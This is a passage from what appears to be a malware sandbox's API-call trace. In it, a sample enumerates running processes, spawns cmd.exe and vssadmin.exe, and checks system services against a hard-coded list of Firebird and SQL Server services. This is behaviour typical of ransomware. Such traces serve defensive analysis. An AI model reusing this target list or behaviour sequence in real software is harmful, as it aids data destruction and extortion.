th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0222.793] lstrlenW (lpString="dwm.exe") returned 7 [0222.793] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x59, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.793] lstrlenW (lpString="svchost.exe") returned 11 [0222.794] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.794] lstrlenW (lpString="svchost.exe") returned 11 [0222.794] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.795] lstrlenW (lpString="svchost.exe") returned 11 [0222.795] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.796] lstrlenW (lpString="svchost.exe") returned 11 [0222.796] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.796] lstrlenW (lpString="svchost.exe") returned 11 [0222.797] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.797] lstrlenW (lpString="svchost.exe") returned 11 [0222.797] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.798] lstrlenW (lpString="svchost.exe") returned 11 [0222.798] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.840] lstrlenW (lpString="svchost.exe") returned 11 [0222.840] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.841] lstrlenW (lpString="svchost.exe") returned 11 [0222.841] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0222.842] lstrlenW (lpString="spoolsv.exe") returned 11 [0222.842] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.843] lstrlenW (lpString="svchost.exe") returned 11 [0222.843] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.844] lstrlenW (lpString="svchost.exe") returned 11 [0222.844] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0222.845] lstrlenW (lpString="audiodg.exe") returned 11 [0222.845] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0222.845] lstrlenW (lpString="sihost.exe") returned 10 [0222.845] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.846] lstrlenW (lpString="svchost.exe") returned 11 [0222.846] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.847] lstrlenW (lpString="taskhostw.exe") returned 13 [0222.847] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0222.849] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0222.849] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0222.849] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0222.849] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.850] lstrlenW (lpString="explorer.exe") returned 12 [0222.850] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0222.851] lstrlenW (lpString="Memory Compression") returned 18 [0222.851] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0222.852] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0222.852] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0222.852] lstrlenW (lpString="SearchUI.exe") returned 12 [0222.852] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0222.853] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0222.853] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.854] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0222.854] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0222.855] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0222.855] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0222.855] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0222.855] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.856] lstrlenW (lpString="conhost.exe") returned 11 [0222.856] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0222.857] lstrlenW (lpString="roof competitive.exe") returned 20 [0222.857] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0222.858] lstrlenW (lpString="trustees.exe") returned 12 [0222.858] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0222.858] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0222.858] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0222.859] lstrlenW (lpString="isbn.exe") returned 8 [0222.859] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0222.860] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0222.860] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0222.861] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0222.861] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0222.861] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0222.861] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0222.862] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0222.862] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0222.863] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0222.863] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0222.864] lstrlenW (lpString="playstation iraq.exe") returned 20 [0222.864] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0222.864] lstrlenW (lpString="harbor.exe") returned 10 [0222.864] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0222.865] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0222.865] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0222.866] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0222.866] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0222.867] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0222.867] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0222.868] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0222.868] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0222.868] lstrlenW (lpString="larent.exe") returned 10 [0222.868] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0222.869] lstrlenW (lpString="stereo.exe") returned 10 [0222.869] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0222.870] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0222.870] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0222.871] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0222.871] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0222.872] lstrlenW (lpString="state.exe") returned 9 [0222.872] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0222.873] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0222.873] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.873] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0222.874] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0222.874] lstrlenW (lpString="taskhostw.exe") returned 13 [0222.874] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.875] lstrlenW (lpString="sppsvc.exe") returned 10 [0222.875] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.876] lstrlenW (lpString="svchost.exe") returned 11 [0222.876] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0222.877] lstrlenW (lpString="Pg.exe") returned 6 [0222.877] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0222.878] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0222.878] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.879] lstrlenW (lpString="conhost.exe") returned 11 [0222.879] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0222.880] lstrlenW (lpString="cmd.exe") returned 7 [0222.880] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.881] lstrlenW (lpString="conhost.exe") returned 11 [0222.881] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0222.882] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0222.882] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0222.883] lstrlenW (lpString="conhost.exe") returned 11 [0222.883] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0222.884] lstrlenW (lpString="vssadmin.exe") returned 12 [0222.884] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0222.884] CloseHandle (hObject=0x45c) returned 1 [0222.884] Sleep (dwMilliseconds=0x1f4) [0223.393] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236ba30 [0223.393] EnumServicesStatusExW (in: hSCManager=0x236ba30, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0223.394] GetLastError () returned 0xea [0223.394] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0223.394] EnumServicesStatusExW (in: hSCManager=0x236ba30, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0223.394] CloseServiceHandle (hSCObject=0x236ba30) returned 1 [0223.395] lstrlenW (lpString="Appinfo") returned 7 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0223.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0223.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0223.395] lstrlenW (lpString="AppXSvc") returned 7 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0223.395] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0223.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0223.395] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0223.395] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0223.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0223.395] lstrlenW (lpString="Audiosrv") returned 8 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0223.395] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0223.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0223.395] lstrlenW (lpString="BFE") returned 3 [0223.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0223.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0223.395] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0223.395] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") 